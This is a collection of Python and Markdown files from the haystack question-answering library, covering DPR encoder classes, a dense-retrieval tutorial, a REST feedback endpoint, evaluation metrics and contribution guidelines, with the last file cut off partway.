PyTorch documentation for all matter related to general\n usage and behavior.\n\n Parameters:\n config (:class:`~transformers.DPRConfig`): Model configuration class with all the parameters of the model.\n Initializing with a config file does not load the weights associated with the model, only the configuration.\n Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model weights.\n\"\"\"\n\n\nDPR_ENCODERS_INPUTS_DOCSTRING = r\"\"\"\n Args:\n input_ids: (:obj:``torch.LongTensor`` of shape ``(batch_size, sequence_length)``):\n Indices of input sequence tokens in the vocabulary.\n To match pre-training, DPR input sequence should be formatted with [CLS] and [SEP] tokens as follows:\n\n (a) For sequence pairs (for a pair title+text for example):\n\n ``tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]``\n\n ``token_type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1``\n\n (b) For single sequences (for a question for example):\n\n ``tokens: [CLS] the dog is hairy . [SEP]``\n\n ``token_type_ids: 0 0 0 0 0 0 0``\n\n DPR is a model with absolute position embeddings so it's usually advised to pad the inputs on\n the right rather than the left.\n\n Indices can be obtained using :class:`transformers.DPRTokenizer`.\n See :func:`transformers.PreTrainedTokenizer.encode` and\n :func:`transformers.PreTrainedTokenizer.convert_tokens_to_ids` for details.\n attention_mask: (:obj:``torch.FloatTensor`` of shape ``(batch_size, sequence_length)``, `optional`, defaults to :obj:`None`):\n Mask to avoid performing attention on padding token indices.\n Mask values selected in ``[0, 1]``:\n ``1`` for tokens that are NOT MASKED, ``0`` for MASKED tokens.\n token_type_ids: (:obj:``torch.LongTensor`` of shape ``(batch_size, sequence_length)``, `optional`, defaults to :obj:`None`):\n Segment token indices to indicate first and second portions of the inputs.\n Indices are selected in ``[0, 1]``: ``0`` corresponds to a `sentence A` token, ``1``\n corresponds to a `sentence B` token\n inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`, defaults to :obj:`None`):\n Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation.\n This is useful if you want more control over how to convert `input_ids` indices into associated vectors\n output_attentions (:obj:`bool`, `optional`, defaults to :obj:`None`):\n If set to ``True``, the attentions tensors of all attention layers are returned. See ``attentions`` under returned tensors for more detail.\n output_hidden_states (:obj:`bool`, `optional`, defaults to :obj:`None`):\n If set to ``True``, the hidden states tensors of all layers are returned. See ``hidden_states`` under returned tensors for more detail.\n\"\"\"\n\n\n@add_start_docstrings(\n \"The bare DPRContextEncoder transformer outputting pooler outputs as context representations.\",\n DPR_START_DOCSTRING,\n)\nclass DPRContextEncoder(DPRPretrainedContextEncoder):\n def __init__(self, config: DPRConfig):\n super().__init__(config)\n self.config = config\n self.ctx_encoder = DPREncoder(config)\n self.init_weights()\n\n @add_start_docstrings_to_callable(DPR_ENCODERS_INPUTS_DOCSTRING)\n @replace_return_docstrings(output_type=DPRContextEncoderOutput, config_class=_CONFIG_FOR_DOC)\n def forward(\n self,\n input_ids: Optional[Tensor] = None,\n attention_mask: Optional[Tensor] = None,\n token_type_ids: Optional[Tensor] = None,\n inputs_embeds: Optional[Tensor] = None,\n output_attentions=None,\n output_hidden_states=None,\n return_tuple=True,\n ) -> Union[DPRContextEncoderOutput, Tuple[Tensor, ...]]:\n r\"\"\"\n Return:\n\n Examples::\n\n from transformers import DPRContextEncoder, DPRContextEncoderTokenizer\n tokenizer = DPRContextEncoderTokenizer.from_pretrained('facebook/dpr-ctx_encoder-single-nq-base')\n model = DPRContextEncoder.from_pretrained('facebook/dpr-ctx_encoder-single-nq-base')\n input_ids = tokenizer(\"Hello, is my dog cute ?\", return_tensors='pt')[\"input_ids\"]\n embeddings = model(input_ids)[0] # the embeddings of the given context.\n\n \"\"\"\n\n output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions\n output_hidden_states = (\n output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states\n )\n return_tuple = return_tuple if return_tuple is not None else self.config.use_return_tuple\n\n if input_ids is not None and inputs_embeds is not None:\n raise ValueError(\"You cannot specify both input_ids and inputs_embeds at the same time\")\n elif input_ids is not None:\n input_shape = input_ids.size()\n device = input_ids.device\n elif inputs_embeds is not None:\n input_shape = torch.Size(inputs_embeds.size()[:-1])\n device = inputs_embeds.device\n else:\n raise ValueError(\"You have to specify either input_ids or inputs_embeds\")\n\n if attention_mask is None:\n attention_mask = (\n torch.ones(input_shape, device=device)\n if input_ids is None\n else (input_ids != self.config.pad_token_id)\n )\n if token_type_ids is None:\n token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)\n\n outputs = self.ctx_encoder(\n input_ids=input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n inputs_embeds=inputs_embeds,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n )\n\n if return_tuple:\n return outputs[1:]\n return DPRContextEncoderOutput(\n pooler_output=outputs.pooler_output, hidden_states=outputs.hidden_states, attentions=outputs.attentions\n )\n\n\n@add_start_docstrings(\n \"The bare DPRQuestionEncoder transformer outputting pooler outputs as question representations.\",\n DPR_START_DOCSTRING,\n)\nclass DPRQuestionEncoder(DPRPretrainedQuestionEncoder):\n def __init__(self, config: DPRConfig):\n super().__init__(config)\n self.config = config\n self.question_encoder = DPREncoder(config)\n self.init_weights()\n\n @add_start_docstrings_to_callable(DPR_ENCODERS_INPUTS_DOCSTRING)\n @replace_return_docstrings(output_type=DPRQuestionEncoderOutput, config_class=_CONFIG_FOR_DOC)\n def forward(\n self,\n input_ids: Optional[Tensor] = None,\n attention_mask: Optional[Tensor] = None,\n token_type_ids: Optional[Tensor] = None,\n inputs_embeds: Optional[Tensor] = None,\n output_attentions=None,\n output_hidden_states=None,\n return_tuple=True,\n ) -> Union[DPRQuestionEncoderOutput, Tuple[Tensor, ...]]:\n r\"\"\"\n Return:\n\n Examples::\n\n from transformers import DPRQuestionEncoder, DPRQuestionEncoderTokenizer\n tokenizer = DPRQuestionEncoderTokenizer.from_pretrained('facebook/dpr-question_encoder-single-nq-base')\n model = DPRQuestionEncoder.from_pretrained('facebook/dpr-question_encoder-single-nq-base')\n input_ids = tokenizer(\"Hello, is my dog cute ?\", return_tensors='pt')[\"input_ids\"]\n embeddings = model(input_ids)[0] # the embeddings of the given question.\n \"\"\"\n output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions\n output_hidden_states = (\n output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states\n )\n return_tuple = return_tuple if return_tuple is not None else self.config.use_return_tuple\n\n if input_ids is not None and inputs_embeds is not None:\n raise ValueError(\"You cannot specify both input_ids and inputs_embeds at the same time\")\n elif input_ids is not None:\n input_shape = input_ids.size()\n device = input_ids.device\n elif inputs_embeds is not None:\n input_shape = torch.Size(inputs_embeds.size()[:-1])\n device = inputs_embeds.device\n else:\n raise ValueError(\"You have to specify either input_ids or inputs_embeds\")\n\n if attention_mask is None:\n attention_mask = (\n torch.ones(input_shape, device=device)\n if input_ids is None\n else (input_ids != self.config.pad_token_id)\n )\n if token_type_ids is None:\n token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)\n\n outputs = self.question_encoder(\n input_ids=input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n inputs_embeds=inputs_embeds,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_tuple=return_tuple,\n )\n\n if return_tuple:\n return outputs[1:]\n return DPRQuestionEncoderOutput(\n pooler_output=outputs.pooler_output, hidden_states=outputs.hidden_states, attentions=outputs.attentions\n )\n\n\n# UTILS\ndef move_to_device(sample, device):\n if len(sample) == 0:\n return {}\n\n def _move_to_device(maybe_tensor, device):\n if torch.is_tensor(maybe_tensor):\n return maybe_tensor.to(device)\n elif isinstance(maybe_tensor, dict):\n return {\n key: _move_to_device(value, device)\n for key, value in maybe_tensor.items()\n }\n elif isinstance(maybe_tensor, list):\n return [_move_to_device(x, device) for x in maybe_tensor]\n elif isinstance(maybe_tensor, tuple):\n return [_move_to_device(x, device) for x in maybe_tensor]\n else:\n return maybe_tensor\n\n return _move_to_device(sample, device)\n\ndef unpack(gzip_file: str, out_file: str):\n print('Uncompressing ', gzip_file)\n input = gzip.GzipFile(gzip_file, 'rb')\n s = input.read()\n input.close()\n output = open(out_file, 'wb')\n output.write(s)\n output.close()\n print('Saved to ', out_file)"
},
{
"alpha_fraction": 0.7384964227676392,
"alphanum_fraction": 0.741736888885498,
"avg_line_length": 49.59016418457031,
"blob_id": "95490e765aca18ba98ebd386e1186eef8beedf14",
"content_id": "b2cb2b9c26a3d73362bae1f966bb185217e4a5be",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3087,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 61,
"path": "/tutorials/Tutorial6_Better_Retrieval_via_DPR.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from haystack import Finder\nfrom haystack.database.faiss import FAISSDocumentStore\nfrom haystack.indexing.cleaning import clean_wiki_text\nfrom haystack.indexing.utils import convert_files_to_dicts, fetch_archive_from_http\nfrom haystack.reader.farm import FARMReader\nfrom haystack.utils import print_answers\nfrom haystack.retriever.dense import DensePassageRetriever\n\n\n# FAISS is a library for efficient similarity search on a cluster of dense vectors.\n# The FAISSDocumentStore uses a SQL(SQLite in-memory be default) database under-the-hood\n# to store the document text and other meta data. The vector embeddings of the text are\n# indexed on a FAISS Index that later is queried for searching answers.\ndocument_store = FAISSDocumentStore()\n\n# ## Cleaning & indexing documents\n# Let's first get some documents that we want to query\ndoc_dir = \"data/article_txt_got\"\ns3_url = \"https://s3.eu-central-1.amazonaws.com/deepset.ai-farm-qa/datasets/documents/wiki_gameofthrones_txt.zip\"\nfetch_archive_from_http(url=s3_url, output_dir=doc_dir)\n\n# convert files to dicts containing documents that can be indexed to our datastore\ndicts = convert_files_to_dicts(dir_path=doc_dir, clean_func=clean_wiki_text, split_paragraphs=True)\n\n# Now, let's write the docs to our DB.\ndocument_store.write_documents(dicts)\n\n### Retriever\nretriever = DensePassageRetriever(document_store=document_store,\n query_embedding_model=\"facebook/dpr-question_encoder-single-nq-base\",\n passage_embedding_model=\"facebook/dpr-ctx_encoder-single-nq-base\",\n use_gpu=True,\n embed_title=True,\n remove_sep_tok_from_untitled_passages=True)\n\n# Important:\n# Now that after we have the DPR initialized, we need to call update_embeddings() to iterate over all\n# previously indexed documents and update their embedding representation.\n# While this can be a time consuming operation (depending on corpus size), it only needs to be done once.\n# At query time, we only need to embed the query and compare it the existing doc embeddings which is very fast.\ndocument_store.update_embeddings(retriever)\n\n### Reader\n# Load a local model or any of the QA models on\n# Hugging Face's model hub (https://huggingface.co/models)\nreader = FARMReader(model_name_or_path=\"deepset/roberta-base-squad2\", use_gpu=True)\n\n### Finder\n# The Finder sticks together reader and retriever in a pipeline to answer our actual questions.\nfinder = Finder(reader, retriever)\n\n### Voilà! Ask a question!\n# You can configure how many candidates the reader and retriever shall return\n# The higher top_k_retriever, the better (but also the slower) your answers.\nprediction = finder.get_answers(question=\"Who is the father of Arya Stark?\", top_k_retriever=10, top_k_reader=5)\n\n\n# prediction = finder.get_answers(question=\"Who created the Dothraki vocabulary?\", top_k_reader=5)\n# prediction = finder.get_answers(question=\"Who is the sister of Sansa?\", top_k_reader=5)\n\nprint_answers(prediction, details=\"minimal\")\n"
},
{
"alpha_fraction": 0.6692664623260498,
"alphanum_fraction": 0.6715851426124573,
"avg_line_length": 34.402984619140625,
"blob_id": "a101426500aec2b0cdc804044f890095a281593c",
"content_id": "c0039a0627482b046a1be4ca0a6614da000e15ad",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4744,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 134,
"path": "/rest_api/controller/feedback.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from typing import Optional\n\nfrom fastapi import APIRouter\nfrom pydantic import BaseModel, Field\n\nfrom haystack.database.elasticsearch import ElasticsearchDocumentStore\nfrom rest_api.config import (\n DB_HOST,\n DB_PORT,\n DB_USER,\n DB_PW,\n DB_INDEX,\n ES_CONN_SCHEME,\n TEXT_FIELD_NAME,\n SEARCH_FIELD_NAME,\n EMBEDDING_DIM,\n EMBEDDING_FIELD_NAME,\n EXCLUDE_META_DATA_FIELDS,\n FAQ_QUESTION_FIELD_NAME,\n)\nfrom rest_api.config import DB_INDEX_FEEDBACK\n\nrouter = APIRouter()\n\ndocument_store = ElasticsearchDocumentStore(\n host=DB_HOST,\n port=DB_PORT,\n username=DB_USER,\n password=DB_PW,\n index=DB_INDEX,\n scheme=ES_CONN_SCHEME,\n ca_certs=False,\n verify_certs=False,\n text_field=TEXT_FIELD_NAME,\n search_fields=SEARCH_FIELD_NAME,\n faq_question_field=FAQ_QUESTION_FIELD_NAME,\n embedding_dim=EMBEDDING_DIM,\n embedding_field=EMBEDDING_FIELD_NAME,\n excluded_meta_data=EXCLUDE_META_DATA_FIELDS, # type: ignore\n)\n\n\nclass FAQQAFeedback(BaseModel):\n question: str = Field(..., description=\"The question input by the user, i.e., the query.\")\n is_correct_answer: bool = Field(..., description=\"Whether the answer is correct or not.\")\n document_id: str = Field(..., description=\"The document in the query result for which feedback is given.\")\n model_id: Optional[int] = Field(None, description=\"The model used for the query.\")\n\n\nclass DocQAFeedback(FAQQAFeedback):\n is_correct_document: bool = Field(\n ...,\n description=\"In case of negative feedback, there could be two cases; incorrect answer but correct \"\n \"document & incorrect document. This flag denotes if the returned document was correct.\",\n )\n answer: str = Field(..., description=\"The answer string.\")\n offset_start_in_doc: int = Field(\n ..., description=\"The answer start offset in the original doc. Only required for doc-qa feedback.\"\n )\n\n\[email protected](\"/doc-qa-feedback\")\ndef doc_qa_feedback(feedback: DocQAFeedback):\n document_store.write_labels([{\"origin\": \"user-feedback\", **feedback.dict()}])\n\n\[email protected](\"/faq-qa-feedback\")\ndef faq_qa_feedback(feedback: FAQQAFeedback):\n feedback_payload = {\"is_correct_document\": feedback.is_correct_answer, \"answer\": None, **feedback.dict()}\n document_store.write_labels([{\"origin\": \"user-feedback-faq\", **feedback_payload}])\n\n\[email protected](\"/export-doc-qa-feedback\")\ndef export_doc_qa_feedback(context_size: int = 2_000):\n \"\"\"\n SQuAD format JSON export for question/answer pairs that were marked as \"relevant\".\n\n The context_size param can be used to limit response size for large documents.\n \"\"\"\n labels = document_store.get_all_labels(\n index=DB_INDEX_FEEDBACK, filters={\"is_correct_answer\": [True], \"origin\": [\"user-feedback\"]}\n )\n\n export_data = []\n for label in labels:\n document = document_store.get_document_by_id(label.document_id)\n text = document.text\n\n # the final length of context(including the answer string) is 'context_size'.\n # we try to add equal characters for context before and after the answer string.\n # if either beginning or end of text is reached, we correspondingly\n # append more context characters at the other end of answer string.\n context_to_add = int((context_size - len(label.answer)) / 2)\n\n start_pos = max(label.offset_start_in_doc - context_to_add, 0)\n additional_context_at_end = max(context_to_add - label.offset_start_in_doc, 0)\n\n end_pos = min(label.offset_start_in_doc + len(label.answer) + context_to_add, len(text) - 1)\n additional_context_at_start = max(label.offset_start_in_doc + len(label.answer) + context_to_add - len(text), 0)\n\n start_pos = max(0, start_pos - additional_context_at_start)\n end_pos = min(len(text) - 1, end_pos + additional_context_at_end)\n\n context_to_export = text[start_pos:end_pos]\n\n export_data.append({\"paragraphs\": [{\"qas\": label, \"context\": context_to_export}]})\n\n export = {\"data\": export_data}\n\n return export\n\n\[email protected](\"/export-faq-qa-feedback\")\ndef export_faq_feedback():\n \"\"\"\n Export feedback for faq-qa in JSON format.\n \"\"\"\n\n labels = document_store.get_all_labels(index=DB_INDEX_FEEDBACK, filters={\"origin\": [\"user-feedback-faq\"]})\n\n export_data = []\n for label in labels:\n document = document_store.get_document_by_id(label.document_id)\n feedback = {\n \"question\": document.question,\n \"query\": label.question,\n \"is_correct_answer\": label.is_correct_answer,\n \"is_correct_document\": label.is_correct_answer,\n }\n export_data.append(feedback)\n\n export = {\"data\": export_data}\n\n return export\n"
},
{
"alpha_fraction": 0.5685575008392334,
"alphanum_fraction": 0.5794327259063721,
"avg_line_length": 45.350807189941406,
"blob_id": "67cce80f1c790a412b07c5387d3d9bb35ac729d0",
"content_id": "ef14372515f617ab0a6bf005b874f04bd988e3c8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11494,
"license_type": "permissive",
"max_line_length": 142,
"num_lines": 248,
"path": "/haystack/eval.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from typing import List, Tuple, Dict, Any\n\nfrom haystack.database.base import MultiLabel\n\n\ndef calculate_reader_metrics(metric_counts: Dict[str, float], correct_retrievals: int):\n number_of_has_answer = correct_retrievals - metric_counts[\"number_of_no_answer\"]\n\n metrics = {\n \"reader_top1_accuracy\" : metric_counts[\"correct_readings_top1\"] / correct_retrievals,\n \"reader_top1_accuracy_has_answer\" : metric_counts[\"correct_readings_top1_has_answer\"] / number_of_has_answer,\n \"reader_topk_accuracy\" : metric_counts[\"correct_readings_topk\"] / correct_retrievals,\n \"reader_topk_accuracy_has_answer\" : metric_counts[\"correct_readings_topk_has_answer\"] / number_of_has_answer,\n \"reader_top1_em\" : metric_counts[\"exact_matches_top1\"] / correct_retrievals,\n \"reader_top1_em_has_answer\" : metric_counts[\"exact_matches_top1_has_answer\"] / number_of_has_answer,\n \"reader_topk_em\" : metric_counts[\"exact_matches_topk\"] / correct_retrievals,\n \"reader_topk_em_has_answer\" : metric_counts[\"exact_matches_topk_has_answer\"] / number_of_has_answer,\n \"reader_top1_f1\" : metric_counts[\"summed_f1_top1\"] / correct_retrievals,\n \"reader_top1_f1_has_answer\" : metric_counts[\"summed_f1_top1_has_answer\"] / number_of_has_answer,\n \"reader_topk_f1\" : metric_counts[\"summed_f1_topk\"] / correct_retrievals,\n \"reader_topk_f1_has_answer\" : metric_counts[\"summed_f1_topk_has_answer\"] / number_of_has_answer,\n }\n\n if metric_counts[\"number_of_no_answer\"]:\n metrics[\"reader_top1_no_answer_accuracy\"] = metric_counts[\"correct_no_answers_top1\"] / metric_counts[\n \"number_of_no_answer\"]\n metrics[\"reader_topk_no_answer_accuracy\"] = metric_counts[\"correct_no_answers_topk\"] / metric_counts[\n \"number_of_no_answer\"]\n else:\n metrics[\"reader_top1_no_answer_accuracy\"] = None # type: ignore\n metrics[\"reader_topk_no_answer_accuracy\"] = None # type: ignore\n\n return metrics\n\n\ndef calculate_average_precision(questions_with_docs: List[dict]):\n questions_with_correct_doc = []\n summed_avg_precision_retriever = 0.0\n\n for question in questions_with_docs:\n for doc_idx, doc in enumerate(question[\"docs\"]):\n # check if correct doc among retrieved docs\n if doc.id in question[\"question\"].multiple_document_ids:\n summed_avg_precision_retriever += 1 / (doc_idx + 1)\n questions_with_correct_doc.append({\n \"question\": question[\"question\"],\n \"docs\": question[\"docs\"]\n })\n break\n\n return questions_with_correct_doc, summed_avg_precision_retriever\n\n\ndef eval_counts_reader(question: MultiLabel, predicted_answers: Dict[str, Any], metric_counts: Dict[str, float]):\n # Calculates evaluation metrics for one question and adds results to counter.\n # check if question is answerable\n if not question.no_answer:\n found_answer = False\n found_em = False\n best_f1 = 0\n for answer_idx, answer in enumerate(predicted_answers[\"answers\"]):\n if answer[\"document_id\"] in question.multiple_document_ids:\n gold_spans = [{\"offset_start\": question.multiple_offset_start_in_docs[i],\n \"offset_end\": question.multiple_offset_start_in_docs[i] + len(question.multiple_answers[i]),\n \"doc_id\": question.multiple_document_ids[i]} for i in range(len(question.multiple_answers))] # type: ignore\n predicted_span = {\"offset_start\": answer[\"offset_start_in_doc\"],\n \"offset_end\": answer[\"offset_end_in_doc\"],\n \"doc_id\": answer[\"document_id\"]}\n best_f1_in_gold_spans = 0\n for gold_span in gold_spans:\n if gold_span[\"doc_id\"] == predicted_span[\"doc_id\"]:\n # check if overlap between gold answer and predicted answer\n if not found_answer:\n metric_counts, found_answer = _count_overlap(gold_span, predicted_span, metric_counts, answer_idx) # type: ignore\n\n # check for exact match\n if not found_em:\n metric_counts, found_em = _count_exact_match(gold_span, predicted_span, metric_counts, answer_idx) # type: ignore\n\n # calculate f1\n current_f1 = _calculate_f1(gold_span, predicted_span) # type: ignore\n if current_f1 > best_f1_in_gold_spans:\n best_f1_in_gold_spans = current_f1\n # top-1 f1\n if answer_idx == 0:\n metric_counts[\"summed_f1_top1\"] += best_f1_in_gold_spans\n metric_counts[\"summed_f1_top1_has_answer\"] += best_f1_in_gold_spans\n if best_f1_in_gold_spans > best_f1:\n best_f1 = best_f1_in_gold_spans\n\n if found_em:\n break\n # top-k answers: use best f1-score\n metric_counts[\"summed_f1_topk\"] += best_f1\n metric_counts[\"summed_f1_topk_has_answer\"] += best_f1\n\n # question not answerable\n else:\n metric_counts[\"number_of_no_answer\"] += 1\n metric_counts = _count_no_answer(predicted_answers[\"answers\"], metric_counts)\n\n return metric_counts\n\n\ndef eval_counts_reader_batch(pred: Dict[str, Any], metric_counts: Dict[str, float]):\n # Calculates evaluation metrics for one question and adds results to counter.\n\n # check if question is answerable\n if not pred[\"label\"].no_answer:\n found_answer = False\n found_em = False\n best_f1 = 0\n for answer_idx, answer in enumerate(pred[\"answers\"]):\n # check if correct document:\n if answer[\"document_id\"] in pred[\"label\"].multiple_document_ids:\n gold_spans = [{\"offset_start\": pred[\"label\"].multiple_offset_start_in_docs[i],\n \"offset_end\": pred[\"label\"].multiple_offset_start_in_docs[i] + len(pred[\"label\"].multiple_answers[i]),\n \"doc_id\": pred[\"label\"].multiple_document_ids[i]}\n for i in range(len(pred[\"label\"].multiple_answers))] # type: ignore\n predicted_span = {\"offset_start\": answer[\"offset_start_in_doc\"],\n \"offset_end\": answer[\"offset_end_in_doc\"],\n \"doc_id\": answer[\"document_id\"]}\n\n best_f1_in_gold_spans = 0\n for gold_span in gold_spans:\n if gold_span[\"doc_id\"] == predicted_span[\"doc_id\"]:\n # check if overlap between gold answer and predicted answer\n if not found_answer:\n metric_counts, found_answer = _count_overlap(\n gold_span, predicted_span, metric_counts, answer_idx\n )\n # check for exact match\n if not found_em:\n metric_counts, found_em = _count_exact_match(\n gold_span, predicted_span, metric_counts, answer_idx\n )\n # calculate f1\n current_f1 = _calculate_f1(gold_span, predicted_span)\n if current_f1 > best_f1_in_gold_spans:\n best_f1_in_gold_spans = current_f1\n # top-1 f1\n if answer_idx == 0:\n metric_counts[\"summed_f1_top1\"] += best_f1_in_gold_spans\n metric_counts[\"summed_f1_top1_has_answer\"] += best_f1_in_gold_spans\n if best_f1_in_gold_spans > best_f1:\n best_f1 = best_f1_in_gold_spans\n\n if found_em:\n break\n\n # top-k answers: use best f1-score\n metric_counts[\"summed_f1_topk\"] += best_f1\n metric_counts[\"summed_f1_topk_has_answer\"] += best_f1\n\n # question not answerable\n else:\n metric_counts[\"number_of_no_answer\"] += 1\n metric_counts = _count_no_answer(pred[\"answers\"], metric_counts)\n\n return metric_counts\n\n\ndef _count_overlap(\n gold_span: Dict[str, Any],\n predicted_span: Dict[str, Any],\n metric_counts: Dict[str, float],\n answer_idx: int\n ):\n # Checks if overlap between prediction and real answer.\n\n found_answer = False\n\n if (gold_span[\"offset_start\"] <= predicted_span[\"offset_end\"]) and \\\n (predicted_span[\"offset_start\"] <= gold_span[\"offset_end\"]):\n # top-1 answer\n if answer_idx == 0:\n metric_counts[\"correct_readings_top1\"] += 1\n metric_counts[\"correct_readings_top1_has_answer\"] += 1\n # top-k answers\n metric_counts[\"correct_readings_topk\"] += 1\n metric_counts[\"correct_readings_topk_has_answer\"] += 1\n found_answer = True\n\n return metric_counts, found_answer\n\n\ndef _count_exact_match(\n gold_span: Dict[str, Any],\n predicted_span: Dict[str, Any],\n metric_counts: Dict[str, float],\n answer_idx: int\n ):\n # Check if exact match between prediction and real answer.\n # As evaluation needs to be framework independent, we cannot use the farm.evaluation.metrics.py functions.\n\n found_em = False\n\n if (gold_span[\"offset_start\"] == predicted_span[\"offset_start\"]) and \\\n (gold_span[\"offset_end\"] == predicted_span[\"offset_end\"]):\n # top-1 answer\n if answer_idx == 0:\n metric_counts[\"exact_matches_top1\"] += 1\n metric_counts[\"exact_matches_top1_has_answer\"] += 1\n # top-k answers\n metric_counts[\"exact_matches_topk\"] += 1\n metric_counts[\"exact_matches_topk_has_answer\"] += 1\n found_em = True\n\n return metric_counts, found_em\n\n\ndef _calculate_f1(gold_span: Dict[str, Any], predicted_span: Dict[str, Any]):\n # Calculates F1-Score for prediction based on real answer using character offsets.\n # As evaluation needs to be framework independent, we cannot use the farm.evaluation.metrics.py functions.\n\n pred_indices = list(range(predicted_span[\"offset_start\"], predicted_span[\"offset_end\"]))\n gold_indices = list(range(gold_span[\"offset_start\"], gold_span[\"offset_end\"]))\n n_overlap = len([x for x in pred_indices if x in gold_indices])\n if pred_indices and gold_indices and n_overlap:\n precision = n_overlap / len(pred_indices)\n recall = n_overlap / len(gold_indices)\n f1 = (2 * precision * recall) / (precision + recall)\n\n return f1\n else:\n return 0\n\n\ndef _count_no_answer(answers: List[dict], metric_counts: Dict[str, float]):\n # Checks if one of the answers is 'no answer'.\n\n for answer_idx, answer in enumerate(answers):\n # check if 'no answer'\n if answer[\"answer\"] is None:\n # top-1 answer\n if answer_idx == 0:\n metric_counts[\"correct_no_answers_top1\"] += 1\n metric_counts[\"correct_readings_top1\"] += 1\n metric_counts[\"exact_matches_top1\"] += 1\n metric_counts[\"summed_f1_top1\"] += 1\n # top-k answers\n metric_counts[\"correct_no_answers_topk\"] += 1\n metric_counts[\"correct_readings_topk\"] += 1\n metric_counts[\"exact_matches_topk\"] += 1\n metric_counts[\"summed_f1_topk\"] += 1\n break\n\n return metric_counts"
},
{
"alpha_fraction": 0.7732240557670593,
"alphanum_fraction": 0.7768670320510864,
"avg_line_length": 60,
"blob_id": "79167e421d15975e142ff140ef35e255701adb1d",
"content_id": "b66668c9cfc6b16ca13167f8a14c65c31032a314",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1098,
"license_type": "permissive",
"max_line_length": 192,
"num_lines": 18,
"path": "/CONTRIBUTING.md",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "# Contributing to Haystack\n\nWe are very open to community contributions and appreciate anything that improves `haystack`! This includes fixings typos, adding missing documentation, fixing bugs or adding new features.\nTo avoid unnecessary work on either side, please stick to the following process:\n\n1. Check if there is already [an related issue](https://github.com/deepset-ai/haystack/issues).\n2. If there is not, open a new one to start a discussion. Some features might be a nice idea, but don't fit in the scope of Haystack and we hate to close finished PRs!\n3. If we came to the conclusion to move forward with your issue, we will be happy to accept a pull request. Make sure you create a pull request in an early draft version and ask for feedback. \n4. Verify that all tests in the CI pass (and add new ones if you implement anything new)\n\n## Formatting of Pull Requests\n\nPlease give a concise description in the first comment in the PR that includes: \n- What is changing?\n- Why? \n- What are limitations?\n- Breaking changes (Example of before vs. after)\n- Link the issue that this relates to\n"
},
{
"alpha_fraction": 0.5586445927619934,
"alphanum_fraction": 0.5592606663703918,
"avg_line_length": 41.71052551269531,
"blob_id": "760c3df7600b3359da8708044861a84cd02d936e",
"content_id": "26bb80a9223c1411664da420c3f6e42a7d54ae1c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12985,
"license_type": "permissive",
"max_line_length": 127,
"num_lines": 304,
"path": "/haystack/database/base.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import logging\nfrom abc import abstractmethod, ABC\nfrom typing import Any, Optional, Dict, List, Union\nfrom uuid import uuid4\n\nimport numpy as np\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Document:\n def __init__(self, text: str,\n id: str = None,\n query_score: Optional[float] = None,\n question: Optional[str] = None,\n meta: Optional[Dict[str, Any]] = None,\n embedding: Optional[np.array] = None):\n \"\"\"\n Object used to represent documents / passages in a standardized way within Haystack.\n For example, this is what the retriever will return from the DocumentStore,\n regardless if it's ElasticsearchDocumentStore or InMemoryDocumentStore.\n\n Note that there can be multiple Documents originating from one file (e.g. PDF),\n if you split the text into smaller passages. We'll have one Document per passage in this case.\n\n :param id: ID used within the DocumentStore\n :param text: Text of the document\n :param query_score: Retriever's query score for a retrieved document\n :param question: Question text for FAQs.\n :param meta: Meta fields for a document like name, url, or author.\n :param embedding: Vector encoding of the text\n \"\"\"\n\n self.text = text\n # Create a unique ID (either new one, or one from user input)\n if id:\n self.id = str(id)\n else:\n self.id = str(uuid4())\n\n self.query_score = query_score\n self.question = question\n self.meta = meta\n self.embedding = embedding\n\n def to_dict(self, field_map={}):\n inv_field_map = {v:k for k, v in field_map.items()}\n _doc: Dict[str, str] = {}\n for k, v in self.__dict__.items():\n k = k if k not in inv_field_map else inv_field_map[k]\n _doc[k] = v\n return _doc\n\n @classmethod\n def from_dict(cls, dict, field_map={}):\n _doc = dict.copy()\n init_args = [\"text\", \"id\", \"query_score\", \"question\", \"meta\", \"embedding\"]\n if \"meta\" not in _doc.keys():\n _doc[\"meta\"] = {}\n # copy additional fields into \"meta\"\n for k, v in _doc.items():\n if k not in init_args and k not in field_map:\n _doc[\"meta\"][k] = v\n # remove additional fields from top level\n _new_doc = {}\n for k, v in _doc.items():\n if k in init_args:\n _new_doc[k] = v\n elif k in field_map:\n k = field_map[k]\n _new_doc[k] = v\n\n return cls(**_new_doc)\n\n\nclass Label:\n def __init__(self, question: str,\n answer: str,\n is_correct_answer: bool,\n is_correct_document: bool,\n origin: str,\n document_id: Optional[str] = None,\n offset_start_in_doc: Optional[int] = None,\n no_answer: Optional[bool] = None,\n 